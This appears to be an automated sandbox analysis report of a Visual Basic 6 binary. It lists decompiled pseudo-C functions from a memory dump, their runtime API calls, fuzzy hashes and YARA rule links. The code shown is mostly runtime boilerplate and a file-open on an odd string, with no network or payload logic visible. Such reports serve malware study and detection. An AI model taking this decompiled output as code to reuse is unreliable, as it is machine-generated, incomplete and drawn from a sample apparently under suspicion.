			E0043314C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v40;
				void* _v56;
				intOrPtr _v64;
				char _v72;
				char* _t17;
				intOrPtr _t34;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t34;
				_push(0x48);
				L004015F0();
				_v12 = _t34;
				_v8 = 0x401520;
				L00401794();
				L00401794();
				_v64 = 0x17;
				_v72 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t17 =  &_v72;
				_push(_t17);
				L004016DA();
				L0040183C();
				L00401824();
				_push(0x4331e9);
				L00401824();
				L0040182A();
				L00401824();
				return _t17;
			}

0x00433151
0x0043315c
0x0043315d
0x00433164
0x00433167
0x0043316f
0x00433172
0x0043317f
0x0043318a
0x0043318f
0x00433196
0x0043319d
0x0043319f
0x004331a1
0x004331a3
0x004331a5
0x004331a8
0x004331a9
0x004331b3
0x004331bb
0x004331c0
0x004331d3
0x004331db
0x004331e3
0x004331e8

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00433167
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0043317F
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0043318A
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004331A9
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004331B3
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004331BB
__vbaFreeVar.MSVBVM60(004331E9,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004331D3
__vbaFreeStr.MSVBVM60(004331E9,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004331DB
__vbaFreeVar.MSVBVM60(004331E9,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004331E3

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#702ChkstkMove
String ID:
API String ID: 3665094559-0
Opcode ID: 297c16b171b45970b87492ecd8a12381ddfdf06e9331266a9b81c519eb89cb32
Instruction ID: 8e5e7b69b8923eee5dc4f360db3d9c17571f0bb00603fd9174b167a1668112af
Opcode Fuzzy Hash: 297c16b171b45970b87492ecd8a12381ddfdf06e9331266a9b81c519eb89cb32
Instruction Fuzzy Hash: CE011E72804109BACF04EB95CE52EDDB779AF45724F60462AF012360E1EB786B09CA68

Uniqueness

Uniqueness Score: -1.00%

Function 00432C92, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00432C92(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				long long* _v12;
				long long* _v32;
				char _v44;
				char _v68;
				char* _t21;
				long long* _t28;
				long long _t32;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t28;
				_push(0x34);
				L004015F0();
				_v12 = _t28;
				_v8 = 0x4014e0;
				_push(5);
				_push(0x404518);
				_push( &_v44);
				L00401728();
				 *_v32 =  *0x4014d8;
				 *((long long*)(_v32 + 8)) =  *0x4014d0;
				_v68 =  &_v44;
				_t32 =  *0x4014c8;
				 *_t28 = _t32;
				asm("fld1");
				 *_t28 = _t32;
				_push( &_v68);
				L004016FE();
				L0040184E();
				asm("fcomp qword [0x4014c0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_push(L"Electrogalvanise6");
					_push(0xb3);
					_push(0xffffffff);
					_push(0x20);
					L004016F8();
				}
				asm("wait");
				_push(0x432d42);
				_v68 =  &_v44;
				_t21 =  &_v68;
				_push(_t21);
				_push(0);
				L00401722();
				return _t21;
			}

0x00432c97
0x00432ca2
0x00432ca3
0x00432caa
0x00432cad
0x00432cb5
0x00432cb8
0x00432cbf
0x00432cc1
0x00432cc9
0x00432cca
0x00432cd8
0x00432ce3
0x00432ce9
0x00432cec
0x00432cf4
0x00432cf7
0x00432cfb
0x00432d01
0x00432d02
0x00432d07
0x00432d0c
0x00432d12
0x00432d14
0x00432d15
0x00432d17
0x00432d1c
0x00432d21
0x00432d23
0x00432d25
0x00432d25
0x00432d2a
0x00432d2b
0x00432d33
0x00432d36
0x00432d39
0x00432d3a
0x00432d3c
0x00432d41

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00432CAD
__vbaAryConstruct2.MSVBVM60(?,00404518,00000005,?,?,?,?,004015F6), ref: 00432CCA
#683.MSVBVM60(?,?,?,?,?,?,00404518,00000005,?,?,?,?,004015F6), ref: 00432D02
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00404518,00000005,?,?,?,?,004015F6), ref: 00432D07
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000B3,Electrogalvanise6,?,?,?,?,?,?,00404518,00000005), ref: 00432D25
__vbaAryDestruct.MSVBVM60(00000000,?,00432D42,?,?,?,?,?,?,00404518,00000005,?,?,?,?,004015F6), ref: 00432D3C

Strings

Electrogalvanise6, xrefs: 00432D17

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#683ChkstkConstruct2DestructFileOpen
String ID: Electrogalvanise6
API String ID: 1762533548-1554888628
Opcode ID: 02a3352e45a1316939dbbc5f411a9b596649536087eb8583b5fe3182bf9c49c0
Instruction ID: 998fd1acbc0ec641bd13a53142aa44e8232833bda44044bd328e04a07134799a
Opcode Fuzzy Hash: 02a3352e45a1316939dbbc5f411a9b596649536087eb8583b5fe3182bf9c49c0
Instruction Fuzzy Hash: 30115170940609FBDB10AB91DD4AFAEBBBCFB08754F44456AF140771F1DBB865109728

Uniqueness

Uniqueness Score: -1.00%

Function 00427BCD, Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00427BCD(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				void* _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				signed int _v64;
				signed int _v72;
				signed int _t25;
				signed int _t29;
				intOrPtr _t47;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t25 = 0x34;
				L004015F0();
				_v12 = _t47;
				_v8 = 0x4011f0;
				_push(2);
				_push(0x4034b4);
				L004017D0();
				L0040183C();
				_push(_t25);
				_push(0x4034c0);
				L004017F4();
				asm("sbb eax, eax");
				_v64 =  ~( ~( ~_t25));
				L0040182A();
				_t29 = _v64;
				if(_t29 != 0) {
					_v52 = 0x80020004;
					_v60 = 0xa;
					_v36 = 0x80020004;
					_v44 = 0xa;
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004015F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t29 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v64 = _t29;
					if(_v64 >= 0) {
						_v72 = _v72 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x4031f4);
						_push(_a4);
						_push(_v64);
						L00401800();
						_v72 = _t29;
					}
				}
				_v24 = 0x1710;
				_push(0x427cc3);
				return _t29;
			}

0x00427bd2
0x00427bdd
0x00427bde
0x00427be7
0x00427be8
0x00427bf0
0x00427bf3
0x00427bfa
0x00427bfc
0x00427c01
0x00427c0b
0x00427c10
0x00427c11
0x00427c16
0x00427c1d
0x00427c23
0x00427c2a
0x00427c2f
0x00427c35
0x00427c37
0x00427c3e
0x00427c45
0x00427c4c
0x00427c56
0x00427c60
0x00427c61
0x00427c62
0x00427c63
0x00427c67
0x00427c71
0x00427c72
0x00427c73
0x00427c74
0x00427c7d
0x00427c83
0x00427c85
0x00427c8c
0x00427ca8
0x00427c8e
0x00427c8e
0x00427c93
0x00427c98
0x00427c9b
0x00427c9e
0x00427ca3
0x00427ca3
0x00427c8c
0x00427cac
0x00427cb2
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00427BE8
#512.MSVBVM60(004034B4,00000002,?,?,?,?,004015F6), ref: 00427C01
__vbaStrMove.MSVBVM60(004034B4,00000002,?,?,?,?,004015F6), ref: 00427C0B
__vbaStrCmp.MSVBVM60(004034C0,00000000,004034B4,00000002,?,?,?,?,004015F6), ref: 00427C16
__vbaFreeStr.MSVBVM60(004034C0,00000000,004034B4,00000002,?,?,?,?,004015F6), ref: 00427C2A
__vbaChkstk.MSVBVM60(?,?,?,004034C0,00000000,004034B4,00000002,?,?,?,?,004015F6), ref: 00427C56
__vbaChkstk.MSVBVM60(?,?,?,004034C0,00000000,004034B4,00000002,?,?,?,?,004015F6), ref: 00427C67
__vbaHresultCheckObj.MSVBVM60(?,?,004031F4,000002B0,?,?,?,004034C0,00000000,004034B4,00000002,?,?,?,?,004015F6), ref: 00427C9E

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$#512CheckFreeHresultMove
String ID:
API String ID: 3630625846-0
Opcode ID: 9e0b40bb757c72cb6e649a290fc24bf0a5c84c4e20d48bd597e3bf4a3bfeed23
Instruction ID: bf79b5b22e62bc52a823f316a7ed6785add670da8a8caebd4d98f2379b2d73d0
Opcode Fuzzy Hash: 9e0b40bb757c72cb6e649a290fc24bf0a5c84c4e20d48bd597e3bf4a3bfeed23
Instruction Fuzzy Hash: 4B21A170A50708BBDB01DFA2D846B9E7BB5EF04B54F10402EF501BF2E1DBB955418B58

Uniqueness

Uniqueness Score: -1.00%

Function 004334C2, Relevance: 12.1, APIs: 8, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004334C2(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v48;
				char _v56;
				char _v72;
				char* _v80;
				char _v88;
				char _v92;
				char _v96;
				char* _t34;
				char* _t39;
				void* _t44;
				void* _t46;
				intOrPtr _t47;

				_t47 = _t46 - 0xc;
				 *[fs:0x0] = _t47;
				L004015F0();
				_v16 = _t47;
				_v12 = 0x401570;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x4015f6, _t44);
				_push(8);
				_push(0x404584);
				_push( &_v48);
				L00401728();
				_v92 =  &_v48;
				_v80 =  &_v92;
				_v88 = 0x6008;
				_push(0);
				_push(0xffffffff);
				_push(0x40457c);
				_push( &_v88);
				_push( &_v72);
				L004016B6();
				_t34 =  &_v72;
				_push(_t34);
				_push(0x2008);
				L004016BC();
				_v96 = _t34;
				_push( &_v96);
				_push( &_v56);
				L004016C2();
				L00401824();
				_push(0x43358e);
				_v92 =  &_v48;
				_push( &_v92);
				_push(0);
				L00401722();
				_t39 =  &_v56;
				_push(_t39);
				_push(0);
				L00401722();
				return _t39;
			}

0x004334c5
0x004334d4
0x004334de
0x004334e6
0x004334e9
0x004334f0
0x004334ff
0x00433502
0x00433504
0x0043350c
0x0043350d
0x00433515
0x0043351b
0x0043351e
0x00433525
0x00433527
0x00433529
0x00433531
0x00433535
0x00433536
0x0043353b
0x0043353e
0x0043353f
0x00433544
0x00433549
0x0043354f
0x00433553
0x00433554
0x0043355c
0x00433561
0x00433574
0x0043357a
0x0043357b
0x0043357d
0x00433582
0x00433585
0x00433586
0x00433588
0x0043358d

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 004334DE
__vbaAryConstruct2.MSVBVM60(?,00404584,00000008,?,?,?,?,004015F6), ref: 0043350D
#708.MSVBVM60(?,00006008,0040457C,000000FF,00000000), ref: 00433536
__vbaAryVar.MSVBVM60(00002008,?,?,00006008,0040457C,000000FF,00000000), ref: 00433544
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00006008,0040457C,000000FF,00000000), ref: 00433554
__vbaFreeVar.MSVBVM60(?,?,00002008,?,?,00006008,0040457C,000000FF,00000000), ref: 0043355C
__vbaAryDestruct.MSVBVM60(00000000,?,0043358E,?,?,00002008,?,?,00006008,0040457C,000000FF,00000000), ref: 0043357D
__vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,0043358E,?,?,00002008,?,?,00006008,0040457C,000000FF,00000000), ref: 00433588

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Destruct$#708ChkstkConstruct2CopyFree
String ID:
API String ID: 1764220322-0
Opcode ID: 8ea5758ac4e9d9e76cb8f6ab0e63c02c09d69e8a88e7c731b5dfb5d4a5ddac12
Instruction ID: 494093ea40c102cdce92172e06eca0db4a6a9e448f45bc5f7f6cae68477ee4d6
Opcode Fuzzy Hash: 8ea5758ac4e9d9e76cb8f6ab0e63c02c09d69e8a88e7c731b5dfb5d4a5ddac12
Instruction Fuzzy Hash: 2C21F971D40248BBDB00EFD5C946FCEBBB8AB08704F10852BF511BA1D1E778A6098B54

Uniqueness

Uniqueness Score: -1.00%

Function 0042CF0F, Relevance: 12.0, APIs: 8, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0042CF0F(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v44;
				char* _t14;
				intOrPtr _t28;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t28;
				_push(0x1c);
				L004015F0();
				_v12 = _t28;
				_v8 = 0x401450;
				L0040178E();
				_push(1);
				_push(1);
				_push(1);
				_push( &_v44);
				L00401740();
				_t14 =  &_v44;
				_push(_t14);
				L0040177C();
				L0040183C();
				L00401824();
				_push(0x42cf92);
				L0040182A();
				L0040182A();
				return _t14;
			}

0x0042cf14
0x0042cf1f
0x0042cf20
0x0042cf27
0x0042cf2a
0x0042cf32
0x0042cf35
0x0042cf42
0x0042cf47
0x0042cf49
0x0042cf4b
0x0042cf50
0x0042cf51
0x0042cf56
0x0042cf59
0x0042cf5a
0x0042cf64
0x0042cf6c
0x0042cf71
0x0042cf84
0x0042cf8c
0x0042cf91

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042CF2A
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 0042CF42
#539.MSVBVM60(?,00000001,00000001,00000001,?,?,?,?,004015F6), ref: 0042CF51
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001,?,?,?,?,004015F6), ref: 0042CF5A
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001,?,?,?,?,004015F6), ref: 0042CF64
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001,?,?,?,?,004015F6), ref: 0042CF6C
__vbaFreeStr.MSVBVM60(0042CF92,?,?,00000001,00000001,00000001,?,?,?,?,004015F6), ref: 0042CF84
__vbaFreeStr.MSVBVM60(0042CF92,?,?,00000001,00000001,00000001,?,?,?,?,004015F6), ref: 0042CF8C

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#539ChkstkCopy
String ID:
API String ID: 3841497116-0
Opcode ID: 2d2a0045ffa35a8aa5e04560d630a075ce425c7d507af28647260dccf6a2ca94
Instruction ID: 7f02c6aa6f20c82733ea9b682469c9ce0befe9f511e8e9010d525e1ec83c835a
Opcode Fuzzy Hash: 2d2a0045ffa35a8aa5e04560d630a075ce425c7d507af28647260dccf6a2ca94
Instruction Fuzzy Hash: 67016271940208AADB04FB91CD83FDEB778EF04758F50403EF101770E1EBB86A4486A9

Uniqueness

Uniqueness Score: -1.00%

Function 00432EE8, Relevance: 12.0, APIs: 8, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00432EE8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _t12;
				intOrPtr _t28;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t28;
				_t12 = 0x10;
				L004015F0();
				_v12 = _t28;
				_v8 = 0x401500;
				L0040178E();
				L0040178E();
				_push(0);
				_push(1);
				L004016EC();
				L0040183C();
				_push(0x432f5c);
				L0040182A();
				L0040182A();
				L0040182A();
				return _t12;
			}

0x00432eed
0x00432ef8
0x00432ef9
0x00432f02
0x00432f03
0x00432f0b
0x00432f0e
0x00432f1b
0x00432f26
0x00432f2b
0x00432f2d
0x00432f2f
0x00432f39
0x00432f3e
0x00432f46
0x00432f4e
0x00432f56
0x00432f5b

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00432F03
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00432F1B
__vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00432F26
#707.MSVBVM60(00000001,00000000,?,?,?,?,004015F6), ref: 00432F2F
__vbaStrMove.MSVBVM60(00000001,00000000,?,?,?,?,004015F6), ref: 00432F39
__vbaFreeStr.MSVBVM60(00432F5C,00000001,00000000,?,?,?,?,004015F6), ref: 00432F46
__vbaFreeStr.MSVBVM60(00432F5C,00000001,00000000,?,?,?,?,004015F6), ref: 00432F4E
__vbaFreeStr.MSVBVM60(00432F5C,00000001,00000000,?,?,?,?,004015F6), ref: 00432F56

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$#707ChkstkMove
String ID:
API String ID: 1904481427-0
Opcode ID: c098e02cf0be97e6ce379d21501b125eaba5bc8c7003f572bbd765c610a561ae
Instruction ID: 5d5d8c834396fa22db762be3d5f069298cfe96623ad073287ed16cb7c8b581a1
Opcode Fuzzy Hash: c098e02cf0be97e6ce379d21501b125eaba5bc8c7003f572bbd765c610a561ae
Instruction Fuzzy Hash: CCF03671540109ABD704FB52CD43FAF7774AF50704F10813EB401371E1EB786A05C699

Uniqueness

Uniqueness Score: -1.00%

Function 0042BD65, Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0042BD65(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				char _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				char* _t29;
				signed int _t32;
				intOrPtr _t46;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_push(0x2c);
				L004015F0();
				_v12 = _t46;
				_v8 = 0x4013c0;
				L00401794();
				if( *0x435010 != 0) {
					_v60 = 0x435010;
				} else {
					_push(0x435010);
					_push(0x402614);
					L00401812();
					_v60 = 0x435010;
				}
				_t29 =  &_v44;
				L0040180C();
				_v48 = _t29;
				_t32 =  *((intOrPtr*)( *_v48 + 0x1a8))(_v48, _t29,  *((intOrPtr*)( *((intOrPtr*)( *_v60)) + 0x310))( *_v60));
				asm("fclex");
				_v52 = _t32;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x1a8);
					_push(0x403568);
					_push(_v48);
					_push(_v52);
					L00401800();
					_v64 = _t32;
				}
				L004017FA();
				asm("wait");
				_push(0x42be3e);
				L00401824();
				return _t32;
			}

0x0042bd6a
0x0042bd75
0x0042bd76
0x0042bd7d
0x0042bd80
0x0042bd88
0x0042bd8b
0x0042bd98
0x0042bda4
0x0042bdbe
0x0042bda6
0x0042bda6
0x0042bdab
0x0042bdb0
0x0042bdb5
0x0042bdb5
0x0042bdd9
0x0042bddd
0x0042bde2
0x0042bded
0x0042bdf3
0x0042bdf5
0x0042bdfc
0x0042be18
0x0042bdfe
0x0042bdfe
0x0042be03
0x0042be08
0x0042be0b
0x0042be0e
0x0042be13
0x0042be13
0x0042be1f
0x0042be24
0x0042be25
0x0042be38
0x0042be3d

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042BD80
__vbaVarDup.MSVBVM60(?,?,?,?,004015F6), ref: 0042BD98
__vbaNew2.MSVBVM60(00402614,00435010,?,?,?,?,004015F6), ref: 0042BDB0
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042BDDD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,000001A8,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042BE0E
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042BE1F
__vbaFreeVar.MSVBVM60(0042BE3E,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042BE38

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2
String ID:
API String ID: 1725699769-0
Opcode ID: 2907b4e1bbe7c28221ab129e2c45fb863e3dd8940b5c6d72bcaff6de8045b055
Instruction ID: b8515debc2418846675815821fa46a7ebfdfe1d1c0a09894b0fce6b0e9e22034
Opcode Fuzzy Hash: 2907b4e1bbe7c28221ab129e2c45fb863e3dd8940b5c6d72bcaff6de8045b055
Instruction Fuzzy Hash: F0213871A50208BFCB04EFA5D885BDDBBB8FF08704F50842AF011B72A1DB791944DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042BC60, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0042BC60(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v64;
				signed int _v68;
				char* _t29;
				signed int _t33;
				intOrPtr _t46;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_push(0x30);
				L004015F0();
				_v12 = _t46;
				_v8 = 0x4013b0;
				if( *0x435010 != 0) {
					_v64 = 0x435010;
				} else {
					_push(0x435010);
					_push(0x402614);
					L00401812();
					_v64 = 0x435010;
				}
				_t29 =  &_v32;
				L0040180C();
				_v52 = _t29;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004015F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t33 =  *((intOrPtr*)( *_v52 + 0x1b0))(_v52, 0x10, _t29,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x300))( *_v64));
				asm("fclex");
				_v56 = _t33;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x403568);
					_push(_v52);
					_push(_v56);
					L00401800();
					_v68 = _t33;
				}
				L004017FA();
				_push(0x42bd44);
				return _t33;
			}

0x0042bc65
0x0042bc70
0x0042bc71
0x0042bc78
0x0042bc7b
0x0042bc83
0x0042bc86
0x0042bc94
0x0042bcae
0x0042bc96
0x0042bc96
0x0042bc9b
0x0042bca0
0x0042bca5
0x0042bca5
0x0042bcc9
0x0042bccd
0x0042bcd2
0x0042bcd5
0x0042bcdc
0x0042bce6
0x0042bcf0
0x0042bcf1
0x0042bcf2
0x0042bcf3
0x0042bcfc
0x0042bd02
0x0042bd04
0x0042bd0b
0x0042bd27
0x0042bd0d
0x0042bd0d
0x0042bd12
0x0042bd17
0x0042bd1a
0x0042bd1d
0x0042bd22
0x0042bd22
0x0042bd2e
0x0042bd33
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042BC7B
__vbaNew2.MSVBVM60(00402614,00435010,?,?,?,?,004015F6), ref: 0042BCA0
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042BCCD
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042BCE6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,000001B0), ref: 0042BD1D
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004015F6), ref: 0042BD2E

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID:
API String ID: 3189907775-0
Opcode ID: 9a706aab0a0e7bbb33155bad775b2e79c66355fc7bf167a954271f949b3be9cc
Instruction ID: 03add3ab5345523213bcfb32abbd519e7be516ca76d1f25e1720490f7a69504f
Opcode Fuzzy Hash: 9a706aab0a0e7bbb33155bad775b2e79c66355fc7bf167a954271f949b3be9cc
Instruction Fuzzy Hash: 23215C71D10618FFCB05EF95D945B9EB7B9FF08704F50442AF401BB2A1CBB91A009B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042BB6E, Relevance: 9.1, APIs: 6, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0042BB6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a36) {
				intOrPtr _v12;
				intOrPtr _v16;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				signed int _v76;
				signed int _v88;
				char* _t27;
				signed int _t28;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_push(0x40);
				L004015F0();
				_v16 = _t43;
				_v12 = 0x4013a0;
				 *_a36 =  *_a36 & 0x00000000;
				_v64 = 0x403738;
				_v72 = 8;
				L00401794();
				_t27 =  &_v56;
				_push(_t27);
				L0040176A();
				_v76 =  ~(0 | _t27 != 0x00000008);
				L00401824();
				_t28 = _v76;
				if(_t28 != 0) {
					L00401770();
					_t28 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t28);
					asm("fclex");
					_v76 = _t28;
					if(_v76 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x4031f4);
						_push(_a4);
						_push(_v76);
						L00401800();
						_v88 = _t28;
					}
				}
				asm("wait");
				_push(0x42bc43);
				return _t28;
			}

0x0042bb71
0x0042bb74
0x0042bb7f
0x0042bb80
0x0042bb87
0x0042bb8a
0x0042bb92
0x0042bb95
0x0042bb9f
0x0042bba2
0x0042bba9
0x0042bbb6
0x0042bbbb
0x0042bbbe
0x0042bbbf
0x0042bbce
0x0042bbd5
0x0042bbda
0x0042bbe0
0x0042bbe8
0x0042bbf6
0x0042bbf9
0x0042bbfb
0x0042bc02
0x0042bc1b
0x0042bc04
0x0042bc04
0x0042bc06
0x0042bc0b
0x0042bc0e
0x0042bc11
0x0042bc16
0x0042bc16
0x0042bc02
0x0042bc1f
0x0042bc20
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042BB8A
__vbaVarDup.MSVBVM60 ref: 0042BBB6
#563.MSVBVM60(?), ref: 0042BBBF
__vbaFreeVar.MSVBVM60(?), ref: 0042BBD5
__vbaFpI4.MSVBVM60(?), ref: 0042BBE8
__vbaHresultCheckObj.MSVBVM60(?,004013A0,004031F4,00000064), ref: 0042BC11

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
